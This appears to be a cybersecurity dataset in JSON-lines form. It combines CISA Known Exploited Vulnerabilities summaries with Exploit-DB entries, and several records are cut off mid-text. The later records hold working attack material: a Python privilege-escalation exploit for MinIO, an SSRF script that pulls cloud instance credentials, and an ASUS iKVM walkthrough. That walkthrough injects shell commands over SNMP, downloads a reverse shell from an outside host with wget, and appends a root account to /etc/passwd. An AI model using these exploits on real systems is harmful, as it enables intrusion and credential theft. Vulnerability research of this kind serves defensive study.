Disclosure Vulnerability\n\nAffected: Android Pixel\n\nAndroid Pixel contains an information disclosure vulnerability in the fastboot firmware used to support unlocking, flashing, and locking affected devices.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-908\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-29745", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-27198", "text": "JetBrains TeamCity Authentication Bypass Vulnerability\n\nAffected: JetBrains TeamCity\n\nJetBrains TeamCity contains an authentication bypass vulnerability that allows an attacker to perform admin actions.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-288\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-27198", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-23225", "text": "Apple Multiple Products Memory Corruption Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, watchOS, and visionOS kernel contain a memory corruption vulnerability that allows an attacker with arbitrary kernel read and write capability to bypass kernel memory protections.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalo", "cve_id": "CVE-2024-23225", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-23296", "text": "Apple Multiple Products Memory Corruption Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, and watchOS RTKit contain a memory corruption vulnerability that allows an attacker with arbitrary kernel read and write capability to bypass kernel memory protections.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-23296", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21338", "text": "Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Kernel contains an exposed IOCTL with insufficient access control vulnerability within the IOCTL (input and output control) dispatcher in appid.sys that allows a local attacker to achieve privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CW", "cve_id": "CVE-2024-21338", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-1709", "text": "ConnectWise ScreenConnect Authentication Bypass Vulnerability\n\nAffected: ConnectWise ScreenConnect\n\nConnectWise ScreenConnect contains an authentication bypass vulnerability that allows an attacker with network access to the management interface to create a new, administrator-level account on affected devices.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-288\n\n[Source: CISA Known Explo", "cve_id": "CVE-2024-1709", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21410", "text": "Microsoft Exchange Server Privilege Escalation Vulnerability\n\nAffected: Microsoft Exchange Server\n\nMicrosoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-287\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-21410", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21412", "text": "Microsoft Windows Internet Shortcut Files Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Internet Shortcut Files contains an unspecified vulnerability that allows for a security feature bypass.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-693\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-21412", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21351", "text": "Microsoft Windows SmartScreen Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows SmartScreen contains a security feature bypass vulnerability that allows an attacker to bypass the SmartScreen user experience and inject code to potentially gain code execution, which could lead to some data exposure, lack of system availability, or both.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\n", "cve_id": "CVE-2024-21351", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21762", "text": "Fortinet FortiOS Out-of-Bound Write Vulnerability\n\nAffected: Fortinet FortiOS\n\nFortinet FortiOS contains an out-of-bound write vulnerability that allows a remote unauthenticated attacker to execute code or commands via specially crafted HTTP requests.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-21762", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21893", "text": "Ivanti Connect Secure, Policy Secure, and Neurons Server-Side Request Forgery (SSRF) Vulnerability\n\nAffected: Ivanti Connect Secure, Policy Secure, and Neurons\n\nIvanti Connect Secure (ICS, formerly known as Pulse Connect Secure), Ivanti Policy Secure, and Ivanti Neurons contain a server-side request forgery (SSRF) vulnerability in the SAML component that allows an attacker to access certain restricted resources without authentication.\n\nRequired Action: Apply mitigations per vendor instructions o", "cve_id": "CVE-2024-21893", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-23222", "text": "Apple Multiple Products WebKit Type Confusion Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, tvOS, and Safari WebKit contain a type confusion vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply mitigations per vendor instructions or disco", "cve_id": "CVE-2024-23222", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-0519", "text": "Google Chromium V8 Out-of-Bounds Memory Access Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine contains an out-of-bounds memory access vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of th", "cve_id": "CVE-2024-0519", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-21887", "text": "Ivanti Connect Secure and Policy Secure Command Injection Vulnerability\n\nAffected: Ivanti Connect Secure and Policy Secure\n\nIvanti Connect Secure (ICS, formerly known as Pulse Connect Secure) and Ivanti Policy Secure contain a command injection vulnerability in the web components of these products, which can allow an authenticated administrator to send crafted requests to execute code on affected appliances. This vulnerability can be leveraged in conjunction with CVE-2023-46805, an authenticated", "cve_id": "CVE-2024-21887", "source": "cisa_kev", "timestamp": ""} {"id": "53284fec4bfcd72d4e46", "text": "MinIO < 2024-01-31T20-20-33Z - Privilege Escalation\n\n# Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation\n# Date: 2024-04-11\n# Exploit Author: Jenson Zhao\n# Vendor Homepage: https://min.io/\n# Software Link: https://github.com/minio/minio/\n# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z\n# Tested on: Windows 10\n# CVE : CVE-2024-24747\n# Required before execution: pip install minio,requests\n\nimport argparse\nimport datetime\nimport traceback\nimport urllib\nfrom xml.dom.minidom import parseString\nimport requests\nimport json\nimport base64\nfrom minio.credentials import Credentials\nfrom minio.signer import sign_v4_s3\n\nclass CVE_2024_24747:\n new_buckets = []\n old_buckets = []\n def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):\n self.bucket_names = ['pocpublic', 'pocprivate']\n self.new_accesskey = 'miniocvepoc'\n self.new_secretkey = 'MINIOcvePOC'\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',\n 'Content-Type': 'application/json',\n 'Accept': '*/*'\n }\n self.accesskey = accesskey\n self.secretkey = secretkey\n self.verify = verify\n if verify:\n self.url = \"https://\" + host + \":\" + port\n self.console_url = \"https://\" + host + \":\" + console_port\n else:\n self.url = \"http://\" + host + \":\" + port\n self.console_url = \"http://\" + host + \":\" + console_port\n self.credits = Credentials(\n access_key=self.new_accesskey,\n secret_key=self.new_secretkey\n )\n self.login()\n try:\n self.create_buckets()\n self.create_accesskey()\n self.old_buckets = self.console_ls()\n self.console_exp()\n self.new_buckets = self.console_ls()\n\n except:\n traceback.print_stack()\n finally:\n self.delete_accesskey()\n self.delete_buckets()\n if len(self.new_buckets) > len(self.old_buckets):\n print(\"There is CVE-2024-24747 problem with the minio!\")\n print(\"Before the exploit, the buckets are : \" + str(self.old_buckets))\n print(\"After the exploit, the buckets are : \" + str(self.new_buckets))\n else:\n print(\"There is no CVE-2024-24747 problem with the minio!\")\n\n def login(self):\n url = self.url + \"/api/v1/login\"\n payload = json.dumps({\n \"accessKey\": self.accesskey,\n \"secretKey\": self.secretkey\n })\n self.session = requests.session()\n if self.verify:\n self.session.verify = False\n status_code = self.session.request(\"POST\", url, headers=self.headers, data=payload).status_code\n # print(status_code)\n if status_code == 204:\n status_code = 0\n else:\n print('Login failed! Please check if the input accesskey and secretkey are correct!')\n exit(1)\n def create_buckets(self):\n url = self.url + \"/api/v1/buckets\"\n for name in self.bucket_names:\n payload = json.dumps({\n \"name\": name,\n \"versioning\": False,\n \"locking\": False\n })\n status_code = self.session.request(\"POST\", url, headers=self.headers, data=payload).status_code\n # print(status_code)\n if status_code == 200:\n status_code = 0\n else:\n print(\"新建 (New)\"+name+\" bucket 失败 (fail)!\")\n def delete_buckets(self):\n for name in self.bucket_names:\n url = self.url + \"/api/v1/buckets/\" + name\n status_code = self.session.request(\"DELETE\", url, headers=self.headers).status_code\n # print(status_code)\n if status_code == 204:\n status_code = 0\n else:\n print(\"删除 (delete)\"+name+\" bucket 失败 (fail)!\")\n def create_accesskey(self):\n url = self.url + \"/api/v1/service-account-credentials\"\n payload = json.dumps({\n \"policy\": \"{ \\n \\\"Version\\\":\\\"2012-10-17\\\", \\n \\\"Statement\\\":[ \\n { \\n \\\"Effect\\\":\\\"Allow\\\", \\n \\\"Action\\\":[ \\n \\\"s3:*\\\" \\n ], \\n \\\"Resource\\\":[ \\n \\\"arn:aws:s3:::pocpublic\\\", \\n \\\"arn:aws:s3:::pocpublic/*\\\" \\n ] \\n } \\n ] \\n}\",\n \"accessKey\": self.new_accesskey,\n \"secretKey\": self.new_secretkey\n })\n status_code = self.session.request(\"POST\", url, headers=self.headers, data=payload).status_code\n # print(status_code)\n if status_code == 201:\n # print(\"新建 (New)\" + self", "cve_id": "CVE-2024-24747", "source": "exploitdb", "timestamp": "2024-04-12T00:00:00+00:00"} {"id": "3fce0c00255ea82ea641", "text": "Casdoor < v1.331.0 - '/api/set-password' CSRF\n\n# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF\n# Application: Casdoor\n# Version: <= 1.331.0\n# Date: 03/07/2024\n# Exploit Author: Van Lam Nguyen\n# Vendor Homepage: https://casdoor.org/\n# Software Link: https://github.com/casdoor/casdoor\n# Tested on: Windows\n# CVE : CVE-2023-34927\n\nOverview\n==================================================\nCasdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.\nThis vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.\n\nProof of Concept\n==================================================\n\nMade an unauthorized request to /api/set-password that bypassed the old password entry authentication step\n\n\n
\n\n\n\n\nIf a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials\n\nuserOwner: built-in\nuserName: admin\nnewPassword: hacked", "cve_id": "CVE-2023-34927", "source": "exploitdb", "timestamp": "2024-04-02T00:00:00+00:00"} {"id": "e16470793a1a838768b6", "text": "Ladder v0.0.21 - Server-side request forgery (SSRF)\n\n# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF)\n# Date: 2024-01-20\n# Exploit Author: @_chebuya\n# Software Link: https://github.com/everywall/ladder\n# Version: v0.0.1 - v0.0.21\n# Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)\n# CVE: CVE-2024-27620\n# Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs\n\nimport requests\nimport json\n\ntarget_url = \"http://127.0.0.1:8080/api/\"\nimdsv1_url = \"http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance\"\n\nr = requests.get(target_url + imdsv1_url)\nresponse_json = json.loads(r.text)\nprint(response_json[\"body\"])", "cve_id": "CVE-2024-27620", "source": "exploitdb", "timestamp": "2024-03-10T00:00:00+00:00"} {"id": "09b214ca373f7c31bdd0", "text": "ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)\n\n# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)\n# Date: 2023-02-16\n# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023], SC\n# Vendor Homepage: https://servers.asus.com/search?q=ASMB8\n# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)\n# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl\n# CVE: CVE-2023-26602\n\n++++++++++++++++++++\n0x00 DESCRIPTION\n++++++++++++++++++++\nDuring a recent engagement, a remote server management interface has been\ndiscovered. Furthermore, SNMPv2 was found to be enabled, offering write\naccess to the private community, subsequently allowing us to introduce\nSNMP arbitrary extensions to achieve RCE.\nWe also found a hardcoded account sysadmin:superuser by cracking the\nshadow file (md5crypt) found on the system and identifed an \"anonymous\"\nuser w/ the same password, however a lock seems to be in place to prevent\nusing these credentials via SSH (running defshell as default shell).\n+++++++++++++++\n0x01 IMPACT\n+++++++++++++++\nBy exploiting SNMP arbitrary extension, we are able to run any command on\nthe system w/ root privileges, and we are able to introduce our own user\ncircumventing the defshell restriction for SSH.\n+++++++++++++++++++++++++++++++\n0x02 PROOF OF CONCEPT (PoC)\n+++++++++++++++++++++++++++++++\nAt first, we have to create required extensions on the system, e.g. via\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus.\"cmd\"' = createAndGo 'nsExtendCommand.\"cmd\"' = /bin/sh 'nsExtendArgs.\"cmd\"' = '-c \"[command]\"'\nand if everything is set, we can just run that command by\nsnmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects\nwhich will execute our defined command and show us its output.\n+++++++++++++++++++++++++++++++\n0x03 SSH Remote Root Access\n+++++++++++++++++++++++++++++++\nThe identified RCE can be used to transfer a reverse tcp shell created\nby msfvenom for arm little-endian, e.g.\nmsfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin\nWe can now transfer the binary, adjust permissions and finally run it:\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus.\"cmd\"' = createAndGo 'nsExtendCommand.\"cmd\"' = /bin/sh 'nsExtendArgs.\"cmd\"' = '-c \"wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin\"'\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus.\"cmd\"' = createAndGo 'nsExtendCommand.\"cmd\"' = /bin/sh 'nsExtendArgs.\"cmd\"' = '-c \"chmod +x /var/tmp/rt.bin\"'\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus.\"cmd\"' = createAndGo 'nsExtendCommand.\"cmd\"' = /bin/sh 'nsExtendArgs.\"cmd\"' = '-c \"/var/tmp/rt.bin\"'\nAgain, we have to request execution of the lines in the MIB via:\nsnmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects\nWe get a reverse connection from the host, and can now act on the local system\nto easily echo our own line into /etc/passwd:\necho d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd\nBy setting the standard shell to /bin/sh, we are able to get a SSH root\nshell into the system, effectively circumventing the defshell restriction.\n$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g\nBusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n# uname -a\nLinux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown\n# uptime\n15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25\n# head -n 1 /etc/shadow\nsysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::\n---\n#EOF", "cve_id": "CVE-2023-26602", "source": "exploitdb", "timestamp": "2025-04-16T00:00:00+00:00"} {"id": "bfd3b01527fde9aae19a", "text": "Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account\n\n# Exploit Title: CommScope Ruckus IoT Controller 1.7.1.0 - Undocumented Account\n# Date: 2021.05.26\n# Exploit Author: korelogic\n# Vendor Homepage: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf\n# Affected Product: Ruckus IoT Controller\n# Version: 1.7.1.0 and earlier\n# Tested on: Linux\n# CVE : CVE-2021-33216,CVE-2019-1000018\n\n\nKL-001-2021-007: CommScope Ruckus IoT Controller Undocumented Account\nAdvisory ID: KL-001-2021-007\nPublication Date: 2021.05.26\nPublication URL: https://korelogic.com/Resources/Advisories/KL-001-2021-007.txt\n1. Vulnerability Details\nAffected Vendor: CommScope\nAffected Product: Ruckus IoT Controller\nAffected Version: 1.7.1.0 and earlier\nPlatform: Linux\nCWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-912: Hidden Functionality\nCVE ID: CVE-2021-33216\n2. Vulnerability Description\nAn upgrade account is included in the IoT Controller OVA that\nprovides the vendor undocumented access via Secure Copy (SCP).\n3. Technical Description\nOnce the OVA is imported into VirtualBox, a VMDK file is\ncreated. The VMDK file can be mounted and the directory\nstructure and its contents can be perused.\nAn authorized_keys file exists that allows an\nindividual/organization possessing the SSH private key to\naccess the virtual appliance using the 'vriotiotupgrade'\naccount. The 'vriotiotupgrade' account is restricted to scp,\nper the rssh configuration.\nAdditionally, it appears that the IoT Controller has rssh version 2.3.4\ninstalled and in use. At the time of this advisory, there are at least\nthree remote command injection vulnerabilities in this particular version\nof rssh: CVE-2019-3463, CVE-2019-3464 and CVE-2019-1000018.\n4. Mitigation and Remediation Recommendation\nThe vendor has released an updated firmware (1.8.0.0) which\nremediates the described vulnerability. Firmware and release\nnotes are available at:\nhttps://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf\n5. Credit\nThis vulnerability was discovered by Jim Becher (@jimbecher)\nof KoreLogic, Inc.\n6. Disclosure Timeline\n2021.03.30 - KoreLogic submits vulnerability details to\nCommScope.\n2021.03.30 - CommScope acknowledges receipt and the intention\nto investigate.\n2021.04.06 - CommScope notifies KoreLogic that this issue,\nalong with several others reported by KoreLogic,\nwill require more than the standard 45 business\nday remediation timeline.\n2021.04.06 - KoreLogic agrees to extend disclosure embargo if\nnecessary.\n2021.04.30 - CommScope informs KoreLogic that remediation for\nthis vulnerability will be available inside of the\nstandard 45 business day timeline. Requests\nKoreLogic acquire CVE number for this\nvulnerability.\n2021.05.14 - 30 business days have elapsed since the\nvulnerability was reported to CommScope.\n2021.05.17 - CommScope notifies KoreLogic that the patched\nversion of the firmware will be available the week\nof 2021.05.24.\n2021.05.19 - KoreLogic requests CVE from MITRE.\n2021.05.19 - MITRE issues CVE-2021-33216.\n2021.05.25 - CommScope releases firmware 1.8.0.0 and associated\nadvisory.\n2021.05.26 - KoreLogic public disclosure.\n7. Proof of Concept\nWith the VMDK file mounted at the current working directory:\n$ find . -name authorized_keys\n./VRIOT/ap-images/authorized_keys\n./VRIOT/ops/ap-images/authorized_keys\n$ cat VRIOT/ap-images/authorized_keys\nssh-rsa\nAAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==\nchandini.venkatesh@commscope.com\n$ cat VRIOT/ops/ap-images/authorized_keys\nssh-rsa\nAAAAB3NzaC1yc2EAAAADAQABAAACAQCp1X4UH+0IALnLKsqbSZwgbzA1clXWXguNpTZ+Km7irkMaXVRt6IL78mdK+nKUvvQcRnAhQ0TgoqINrdLzMTYwoVaOcBq5Lw21A5JrP8IQANMAiVSM30umJYuTqnbPO4HHIi9/Gk/wUtJiwvD/ygNx7z0g1a9PIzQxOITLpwVkEU2iDdlrZDHR35jI/ddRRsbPe9ezeYGDoprgQagw634fa9tzI74oj5/Xh64679yjA0bQx+i8ZXSIHFPSHp0yiDyMZfvLIqdqb0mEAN1JnaHfIiq4o8/wa8zp7nVADo6Pxweklc1kqALFUxrzdP/6Z0hITp1Ke/xdA2S4LT3ye85QVM/k3Dd54qFpMAJsinYb18Ykyj0PTZskcBWB+l9VevpJXv+3DDH2+98Ledv/fnXQ9VapxW572fX2HkEoh4Nmt5VUx0JPR/0onwOVeuwQLp5qnHxmzgL8DMS62QkTT1VdaCqXS01DMPorKQUtmvAxohJUJX4df9JoOcwRpvKSspn+6UU1krPZHX1QYvPrRsfYhJ9SCzrVxmuC0DR3FqxGoix5su4DqCpRxq0QhwC4+DwIMt4KTIjF3p35s+bjP1luwITJOxVlIswpyZKS0hITFLJtAE7c493wX7hxUdy+LfyHXlMIoJcYM11WXLAysHcWyfmSpQ8H5GV0vxela0Qg7Q==\nchandini.venkatesh@commscope.com\n$ grep \"ap-i", "cve_id": "CVE-2021-33216", "source": "exploitdb", "timestamp": "2025-04-16T00:00:00+00:00"} {"id": "441cd45b5d5721cb01b7", "text": "Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)\n\n# Exploit Title: Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)\n via file upload\n# Date: 2024-08-28\n# Exploit Author: Photubias\n# Vendor Homepage: https://dell.com\n# Vendor Advisory: [1] https://dl.dell.com/manuals/all-products/esuprt_solutions_int/esuprt_solutions_int_solutions_resources/dell-management-solution-resources_White-Papers6_en-us.pdf\n# Version: integrated Dell Remote Access Console v7 & v8 < 2.52.52.52\n# Tested on: iDRAC 7 & 8\n# CVE: CVE-2018-1207\n\nr'''\n Copyright 2024 Photubias(c)\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see